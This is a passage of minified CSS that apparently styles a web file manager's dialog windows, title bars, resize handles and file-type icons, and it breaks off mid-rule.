.dialog-plugin-config.dialog-no-title.form-dialog-has-menu .aui-outer .aui-buttons{box-shadow:0 0 20px #ddd;border-top:1px solid #eee;height:45px;padding-top:5px;border-top:none;background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{left:130px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{position:absolute;left:0;padding:0;width:140px;height:100%;padding-top:20px;z-index:99999;background:#f5f7fa;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{display:block;border:none;background:none;border-radius:0;font-size:14px;-webkit-transition:0.16s all;-moz-transition:0.16s all;-o-transition:0.16s all;-ms-transition:0.16s all;transition:0.16s all;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:hover{background:#eee;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:first-child,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child{border-radius:0;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item a{padding:0 20px 0 15px;display:block;height:40px;line-height:40px;text-align:right;white-space:nowrap;text-overflow:ellipsis;overflow:hidden;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover a,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header{height:40px;border-bottom:1px solid #adabad;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#d3d1d3', endColorstr='#e7e5e7');background-image:-webkit-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-moz-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-o-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-ms-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);-pie-background:linear-gradient(to bottom,#d3d1d3 0%,#e7e5e7 100%);}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:20px;font-size:12px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title img,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title .x-item-file{height:22px;width:22px;top:8px;margin-right:4px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row .setting-title{text-align:right;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.form-userSelect .setting-content{background:#f4f4f4;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.error .setting-content{background:#ffefed;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body{background:#eee;border:1px solid #e3e3e3;margin:20px;top:60px;bottom:30px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body .line,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body hr{border-color:#ddd;}body .dialog-plugin-config.dialog-form-style-mac .tab-group{position:absolute;margin-top:25px;width:100%;z-index:999;}body .dialog-plugin-config.dialog-form-style-mac .aui-content{background:#f9f9f9;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons{padding-right:20px;height:30px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);background:#f9f9f9;border:none;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons button{margin-top:1px;margin-left:20px;padding:0 2em;height:25px;}.message-box{position:absolute;top:15%;left:0px;z-index:88;background:#63acff;color:#fff;opacity:0.7;filter:alpha(opacity=70);-webkit-border-radius:1px;-moz-border-radius:1px;border-radius:1px;-webkit-box-shadow:0 10px 60px rgba(0,0,0,0.6);-moz-box-shadow:0 10px 60px rgba(0,0,0,0.6);box-shadow:0 10px 60px rgba(0,0,0,0.6);display:none;}.message-box .content{padding:10px 30px;line-height:20px;width:auto;}.aui-outer{text-align:left;position:relative;}.aui-mask{position:absolute;width:100%;height:100%;background:#fff;opacity:0.01;filter:alpha(opacity=1);}.aui-loading{height:100%;width:100%;overflow:hidden;opacity:0.7;filter:alpha(opacity=70);position:absolute;left:0;top:40px;z-index:9999;text-align:center;text-indent:-999em;}.aui-loading span{width:80px;height:80px;border-radius:6px;background:#fff url("../../../images/common/dialog/dialog_loading.gif") no-repeat center center;position:absolute;left:50%;top:50%;margin-left:-40px;margin-top:-40px;}table.aui-border,table.aui-dialog{width:100%;border:0;margin:0;border-collapse:collapse;}.aui-nw,.aui-n,.aui-ne,.aui-w,.aui-c,.aui-e,.aui-sw,.aui-s,.aui-se,.aui-header,.aui-td-icon,.aui-main,.aui-footer{padding:0;}.aui-header,.aui-buttons button{font:12px/1.11;}.aui-title{overflow:hidden;text-overflow:ellipsis;font-size:1em;}.aui-title img,.aui-title .x-item-file{width:20px;margin-right:5px;border-radius:4px;cursor:pointer;pointer-events:all;}.aui-title img:hover,.aui-title .x-item-file:hover{transform:scale(1.1,1.1);}.aui-state-no-title .aui-title{display:none;}.aui-main{font-size:1.1em;text-align:center;background:#FFF;min-width:9em;min-width:0 \9;visibility:auto;}.aui-content{text-align:left;color:#666;border:none 0;}.aui-content{width:100%;height:100%;}.aui-content.aui-state-full{display:block;width:100%;margin:0;padding:0 !important;height:100%;}.aui-icon{vertical-align:middle;background:#fff;}.aui-icon div{width:48px;height:48px;margin:10px 0 10px 10px;background-position:center center;background-repeat:no-repeat;}.aui-buttons{padding:10px 8px;text-align:right;white-space:nowrap;background-color:#F6F6F6;border-top:solid 1px #DADEE5;}.aui-buttons button{margin-left:15px;padding:3px 20px;height:25px;cursor:pointer;display:inline-block;text-align:center;line-height:1;overflow:visible;color:#000000;border:none;background:#aaa;color:#fff;}.aui-buttons button:focus{outline:none 0;}.aui-buttons button:hover{background:#c4c4c4;}.aui-buttons button:active{background:#777777;}.aui-buttons button[disabled]{cursor:default;color:#919191;background:#aaa;opacity:0.5;filter:alpha(opacity=50);}.aui-buttons button::-moz-focus-inner{border:0;padding:0;margin:0;}.aui-buttons button.aui-state-highlight{color:#FFF;background:#63acff;}.aui-buttons button.aui-state-highlight:hover{color:#FFF;background:#96c7ff;}.aui-buttons button.aui-state-highlight:active{background:#0076fc;}.aui-buttons button.disable,.aui-buttons button.disabled{opacity:0.3;filter:alpha(opacity=30);}.aui-outer{border:0px solid #63acff;-webkit-box-shadow:0px 5px 20px rgba(0,0,0,0.6);-moz-box-shadow:0px 5px 20px rgba(0,0,0,0.6);box-shadow:0px 5px 20px rgba(0,0,0,0.6);-webkit-transition:box-shadow 0.1s opacity 0.2s;-moz-transition:box-shadow 0.1s opacity 0.2s;-o-transition:box-shadow 0.1s opacity 0.2s;-ms-transition:box-shadow 0.1s opacity 0.2s;transition:box-shadow 0.1s opacity 0.2s;}.aui-state-lock .aui-nw,.aui-state-lock .aui-n,.aui-state-lock .aui-ne,.aui-state-lock .aui-w,.aui-state-lock .aui-e,.aui-state-lock .aui-sw,.aui-state-lock .aui-s,.aui-state-lock .aui-se{background:rgba(0,0,0,0.5);background:#000 \9 !important;opacity:0.5;filter:alpha(opacity=50);}.aui-title-bar{position:relative;height:100%;}.aui-title{height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;background-color:#7dbaff;}.aui-state-focus .aui-mask{display:none;}.aui-state-focus .aui-outer{-webkit-box-shadow:0px 5px 40px rgba(0,0,0,0.7);-moz-box-shadow:0px 5px 40px rgba(0,0,0,0.7);box-shadow:0px 5px 40px rgba(0,0,0,0.7);}.aui-state-focus .aui-title{background-color:#63acff;}.aui-state-drag .aui-title{cursor:move;cursor:-webkit-grabbing;cursor:grabbing;}.aui-min,.aui-max,.aui-close{display:block;position:absolute;text-decoration:none;outline:none;cursor:pointer;font-size:1.25em;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;color:#fff;border-top:none;top:0px;height:22px;width:35px;font-size:1.15em;line-height:22px;text-align:center;background-color:transparent;height:24px;width:38px;line-height:25px;color:#ffffff;font-family:FontAwesome;}.aui-min:hover,.aui-max:hover,.aui-close:hover{text-decoration:none;color:#fff;background-color:#1783ff;}.aui-close:hover{background:#cc0000;}.aui-min{right:82px;content:"\f068";}.aui-max{right:43px;content:"\f065";}.aui-close{right:5px;content:"\f00d";}.aui-min:before{content:"\f068";}.aui-max:before{content:"\f065";}.aui-close:before{content:"\f00d";}.aui-max,.aui-min{display:none;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-se{width:5px;height:5px;}.aui-state-no-title .aui-title-bar{bottom:0;_bottom:0;_margin-top:0;}.aui-state-no-title .aui-outer{box-shadow:none !important;border:none !important;}.aui-state-no-title .aui-inner{border:1px solid #aaa;}.aui-state-no-title .tips{padding:15px;padding-left:10px;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-n,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-w,.aui-state-no-title .aui-e,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-s,.aui-state-no-title .aui-se{background:rgba(0,0,0,0.1);background:#000 \9 !important;filter:alpha(opacity=10)!important;}.aui-state-no-title .aui-close,.aui-state-no-title .aui-max,.aui-state-no-title .aui-min{display:none;font-size:1em;}.dialog-max .aui-nw,.dialog-max .aui-ne,.dialog-max .aui-sw,.dialog-max .aui-se,.dialog-max .aui-w,.dialog-max .aui-e{width:0px;}.dialog-max .aui-sw,.dialog-max .aui-n,.dialog-max .aui-se{height:0px;}.dialog-max .aui-outer{border:none !important;}.dialog-can-resize .resize-handle{position:absolute;z-index:999999;display:block;}.dialog-can-resize .resize-top{cursor:n-resize;top:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-bottom{cursor:s-resize;bottom:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-right{cursor:e-resize;right:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-left{cursor:w-resize;left:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-bottom-right{cursor:se-resize;width:18px;height:18px;right:-7px;bottom:-7px;background:url('../../../images/common/dialog/resize_corner.png') no-repeat;opacity:0.4;filter:alpha(opacity=40);}.dialog-can-resize .resize-bottom-left{cursor:sw-resize;width:15px;height:15px;left:-7px;bottom:-7px;}.dialog-can-resize .resize-top-left{cursor:nw-resize;width:15px;height:15px;left:-7px;top:-7px;}.dialog-can-resize .resize-top-right{cursor:ne-resize;width:15px;height:15px;right:-5px;top:-7px;}.dialog-can-resize .aui-min,.dialog-can-resize .aui-max{display:block;}.dialog-min-size{width:250px !important;height:30px !important;}.dialog-min-size.dialog-no-title .aui-title,.dialog-min-size .aui-title{opacity:1 !important;}.dialog-min-size .aui-outer{width:250px;}.dialog-min-size .aui-header{height:30px;}.dialog-min-size .aui-title{text-align:left;padding-left:10px;}.dialog-min-size .aui-main,.dialog-min-size .aui-footer{display:none;}.dialog-min-size .resize-handle{display:none;}.dialog-no-title .aui-title-bar{position:absolute;z-index:99999;width:100%;height:30px;top:0;}.dialog-no-title .aui-title{opacity:0.01 !important;filter:alpha(opacity=1) !important;}.dialog-no-title .aui-inner{border:none;}.dialog-no-title .aui-nw,.dialog-no-title .aui-n,.dialog-no-title .aui-ne,.dialog-no-title .aui-w,.dialog-no-title .aui-e,.dialog-no-title .aui-sw,.dialog-no-title .aui-s,.dialog-no-title .aui-se{display:none;}.dialog-no-title .aui-outer .aui-min{right:80px;}.dialog-no-title .aui-outer .aui-min:before{content:"\f068" !important;}.dialog-no-title .aui-outer .aui-max{right:40px;}.dialog-no-title .aui-outer .aui-max:before{content:"\f065" !important;}.dialog-no-title .aui-outer .aui-close{right:0px;}.dialog-no-title .aui-outer .aui-close:before{content:"\f00d" !important;}.dialog-no-title .aui-outer .aui-min,.dialog-no-title .aui-outer .aui-max,.dialog-no-title .aui-outer .aui-close{display:block;position:absolute;text-decoration:none;outline:none;font-size:1.25em;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;color:#fff;top:0px;cursor:pointer;height:30px;line-height:30px;text-align:center;background-color:transparent;width:40px;font-family:FontAwesome;border:none;background-image:none;border-radius:0;}.dialog-no-title .aui-outer .aui-min:hover,.dialog-no-title .aui-outer .aui-max:hover,.dialog-no-title .aui-outer .aui-close:hover{color:#fff;border:none;box-shadow:none;background:#41acf8;background:rgba(0,0,0,0.4);}.dialog-no-title .aui-outer .aui-close:hover{background:#e81123;background:rgba(232,17,35,0.8);}.dialog-no-title.header-bg .aui-content .header{height:90px;background-color:#008def;background-image:linear-gradient(to bottom,#084998 0,#00a9fb 100%);color:#fff;position:relative;}.dialog-no-title.header-bg .aui-content .header .bg{background:url("../../../images/common/banner/box.png") 180px -220px no-repeat;width:100%;height:100%;position:absolute;opacity:0.7;}.dialog-no-title.dialog-max .aui-outer .aui-max{right:40px;}.dialog-no-title.dialog-max .aui-outer .aui-max:before{content:"\f066" !important;}body div.dialog-simple .aui-title-bar{width:100%;position:relative;bottom:0;height:100%;}body div.dialog-simple .aui-border{border:none;overflow:auto;}body div.dialog-simple .aui-outer{border:none;border-radius:none;box-shadow:none;background:none;}body div.dialog-simple .aui-inner{border:none;background:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-n,body div.dialog-simple .aui-ne,body div.dialog-simple .aui-w,body div.dialog-simple .aui-e,body div.dialog-simple .aui-sw,body div.dialog-simple .aui-s,body div.dialog-simple .aui-se{background:none;}body div.dialog-simple .aui-title{background:rgba(0,0,0,0.8);opacity:0.8;filter:alpha(opacity=80);border-radius:3px;border:none;height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;}body div.dialog-simple .aui-min,body div.dialog-simple .aui-max,body div.dialog-simple .aui-close{border:none;top:5px;position:absolute;text-decoration:none;outline:none;cursor:pointer;background-color:rgba(255,255,255,0.3);color:#fff;opacity:0.5;filter:alpha(opacity=50);height:22px;width:22px;font-size:1.15em;line-height:22px;text-align:center;border-radius:4px;font-family:FontAwesome;}body div.dialog-simple .aui-min:hover,body div.dialog-simple .aui-max:hover,body div.dialog-simple .aui-close:hover{text-decoration:none;color:#fff;background-color:#cc0000;}body div.dialog-simple .aui-min:active,body div.dialog-simple .aui-max:active,body div.dialog-simple .aui-close:active{color:fff;background-color:#f00;}body div.dialog-simple .aui-main{background:none !important;}body div.dialog-simple .aui-max{right:30px;}body div.dialog-simple .aui-min{right:56px;}body div.dialog-simple .aui-dialog,body div.dialog-simple .aui-border{background:none;}body div.dialog-simple .resize-bottom-right{background:none !important;}body div.dialog-simple .aui-header{opacity:0.01;filter:alpha(opacity=1);border:1px solid rgba(0,0,0,0.01);border-bottom:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-ne{height:0px;}body div.dialog-simple.aui-state-drag .aui-header,body div.dialog-simple .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-can-resize .aui-max,body div.dialog-simple.dialog-can-resize .aui-min{display:block;}body div.dialog-simple.dialog-can-resize .aui-main{border:1px solid rgba(0,0,0,0.01);border-top:none;}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-main,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-main{border-color:rgba(0,0,0,0.2);}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-header,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);border-color:rgba(0,0,0,0.2);}body div.dialog-simple.aui-state-drag .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-max .aui-header{opacity:1.0;filter:alpha(opacity=100);}.x-item-small{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.x-item-file{background-repeat:no-repeat;background-size:cover;background-position:center;background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');width:100%;height:100%;display:inline-block;pointer-events:none;}.x-item-file.small{width:20px;height:20px;}.file-list-icon .file .ico .x-item-file{border-radius:5px;margin-top:6px;margin-top:4px;}.bindary-box .ico .x-item-file{width:90px;height:90px;margin-top:28px;}.file-list-list .file .ico .x-item-file,.file-list-split .file .ico .x-item-file{border:none;}.ztree li span.tree_icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.header-content #yarnball .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.task-tab .tabs .tab .x-item-file,.task-tab .tabs .tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.aui-title .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.edit-tab .tabs .tab .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.draggable-dragging .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.do-search-box .search-result .file-item .file-info .file-icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.context-menu-list .context-menu-item .font-icon.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;margin-right:12px;}.context-menu-list .context-menu-item .font-icon.x-item-file:before{content:"";}.context-menu-list .context-menu-item img.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;background:none;margin-right:12px;height:auto;}.aui-title .x-item-file.x-font-icon{font-size:12px;line-height:18px;color:#fff;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.x-txt.small,.x-textile.small,.x-inc.small,.x-log.small{background-image:url("../../../images/file_icon/icon_file/txt_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-php.small{background-image:url("../../../images/file_icon/icon_file/php_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-txt,.x-textile,.x-oexe,.x-inc,.x-csv,.x-log,.x-asc,.x-tsv,.x-lnk,.x-url,.x-webloc,.x-meta,.x-localized,.x-xib,.x-xsd,.x-storyboard,.x-plist,.x-csproj,.x-pch,.x-pbxproj,.x-local,.x-xcscheme,.x-manifest,.x-vbproj,.x-strings,.x-jshintrc,.x-sublime-project,.x-readme,.x-changes,.x-changelog,.x-version,.x-license,.x-changelog,.x-abap,.x-abc,.x-as,.x-asp,.x-aspx,.x-ada,.x-adb,.x-htaccess,.x-htgroups,.x-htgroups,.x-htpasswd,.x-asciidoc,.x-adoc,.x-asm,.x-a,.x-ahk,.x-bat,.x-cmd,.x-cpp,.x-c,.x-cc,.x-cxx,.x-h,.x-hh,.x-hpp,.x-ino,.x-c9search_results,.x-cirru,.x-cr,.x-clj,.x-cljs,.x-cbl,.x-cob,.x-coffee,.x-cf,.x-cson,.x-cakefile,.x-cfm,.x-cs,.x-css,.x-curly,.x-d,.x-di,.x-dart,.x-diff,.x-patch,.x-dockerfile,.x-dot,.x-dummy,.x-dummy,.x-e,.x-ge,.x-ejs,.x-ex,.x-exs,.x-elm,.x-erl,.x-hrl,.x-frt,.x-fs,.x-ldr,.x-ftl,.x-gcode,.x-feature,.x-.gitignore,.x-glsl,.x-frag,.x-vert,.x-gbs,.x-go,.x-groovy,.x-haml,.x-hbs,.x-handlebars,.x-tpl,.x-mustache,.x-hs,.x-hx,.x-html,.x-hta,.x-htm,.x-xhtml,.x-eex,.x-html.eex,.x-erb,.x-rhtml,.x-html.erb,.x-ini,.x-inf,.x-conf,.x-cfg,.x-prefs,.x-io,.x-jack,.x-jade,.x-java,.x-ji,.x-jl,.x-jq,.x-js,.x-jsm,.x-json,.x-jsp,.x-jsx,.x-latex,.x-ltx,.x-bib,.x-lean,.x-hlean,.x-less,.x-liquid,.x-lisp,.x-ls,.x-logic,.x-lql,.x-lsl,.x-lua,.x-lp,.x-lucene,.x-Makefile,.x-makemakefile,.x-gnumakefile,.x-makefile,.x-ocamlmakefile,.x-make,.x-md,.x-markdown,.x-mask,.x-matlab,.x-mz,.x-mel,.x-mc,.x-mush,.x-mysql,.x-nix,.x-nsi,.x-nsh,.x-m,.x-mm,.x-ml,.x-mli,.x-pas,.x-p,.x-pl,.x-pm,.x-pgsql,.x-php,.x-phtml,.x-shtml,.x-php3,.x-php4,.x-php5,.x-phps,.x-phpt,.x-aw,.x-ctp,.x-module,.x-ps1,.x-praat,.x-praatscript,.x-psc,.x-proc,.x-plg,.x-prolog,.x-properties,.x-proto,.x-py,.x-r,.x-cshtml,.x-rd,.x-rhtml,.x-rst,.x-rb,.x-ru,.x-gemspec,.x-rake,.x-guardfile,.x-rakefile,.x-gemfile,.x-rs,.x-sass,.x-scad,.x-scala,.x-scm,.x-sm,.x-rkt,.x-oak,.x-scheme,.x-scss,.x-sh,.x-bash,.x-bashrc,.x-sjs,.x-smarty,.x-tpl,.x-snippets,.x-soy,.x-space,.x-sql,.x-sqlserver,.x-styl,.x-stylus,.x-svg,.x-swift,.x-tcl,.x-tex,.x-toml,.x-twig,.x-swig,.x-ts,.x-typescript,.x-str,.x-vala,.x-vbs,.x-vb,.x-vm,.x-v,.x-vh,.x-sv,.x-svh,.x-vhd,.x-vhdl,.x-wlk,.x-wpgm,.x-wtest,.x-xml,.x-rdf,.x-rss,.x-wsdl,.x-xslt,.x-atom,.x-mathml,.x-mml,.x-xul,.x-xbl,.x-xaml,.x-xq,.x-yaml,.x-yml,.x-cer,.x-reg,.x-config,.x-srt,.x-ass,.x-lrc{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-pl,.x-pm,.x-cgi,.x-as,.x-asm,.x-clj,.x-cbl,.x-cfm,.x-d,.x-diff,.x-dot,.x-ejs,.x-erl,.x-ftl,.x-go,.x-hs,.x-vbs,.x-haml,.x-erb,.x-jade,.x-json,.x-jq,.x-jsx,.x-ji,.x-tex,.x-lisp,.x-ls,.x-lsl,.x-lua,.x-lp,.x-matlab,.x-mel,.x-r,.x-yaml,.x-yml{background-image:url("../../../images/file_icon/icon_file/code.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');}.x-bin,.x-hex,.x-zip,.x-pdf,.x-swf,.x-gzip,.x-rar,.x-arj,.x-tar,.x-gz,.x-cab,.x-tbz,.x-tbz2,.x-lzh,.x-uue,.x-bz2,.x-ace,.x-exe,.x-so,.x-dll,.x-chm,.x-rtf,.x-odp,.x-odt,.x-pages,.x-class,.x-psd,.x-ttf,.x-fla,.x-dmg,.x-dat,.x-ipa,.x-lib,.x-a,.x-apk,.x-so,.x-o{background-image:url("../../../images/file_icon/icon_file/bin.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');}.x-music,.x-mp3,.x-wma,.x-mp2,.x-mid,.x-aac,.x-ogg,.x-oga,.x-webma,.x-wav,.x-m4a,.x-m3u,.x-m4a,.x-midi,.x-mid,.x-flac,.x-alac,.x-ape,.x-ac3{background-image:url("../../../images/file_icon/icon_file/music.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');}.x-avi,.x-rm,.x-rmvb,.x-mpg,.x-mkv,.x-wmv,.x-mov,.x-mp4,.x-evo,.x-divx,.x-3gp,.x-asf,.x-ogv,.x-webmv,.x-cue,.x-hd,.x-hdmov,.x-mov,.x-mp4v,.x-mpeg,.x-ogm,.x-qt,.x-spx,.x-vob,.x-wmv,.x-xvid,.x-webm,.x-m4v,.x-mts,.x-mpe,.x-m2ts,.x-mpv,.x-cue{background-image:url("../../../images/file_icon/icon_file/movie.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');}.x-flv,.x-f4v{background-image:url("../../../images/file_icon/icon_file/flv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');}.x-html,.x-htm,.x-url,.x-tpl,.x-lnk,.x-haml,.x-shtml,.x-webloc,.x-hta,.x-xhtml{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-css,.x-less,.x-sass{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-js,.x-coffee,.x-jsx{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-xml,.x-config,.x-manifest,.x-xaml,.x-csproj,.x-vbproj{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none 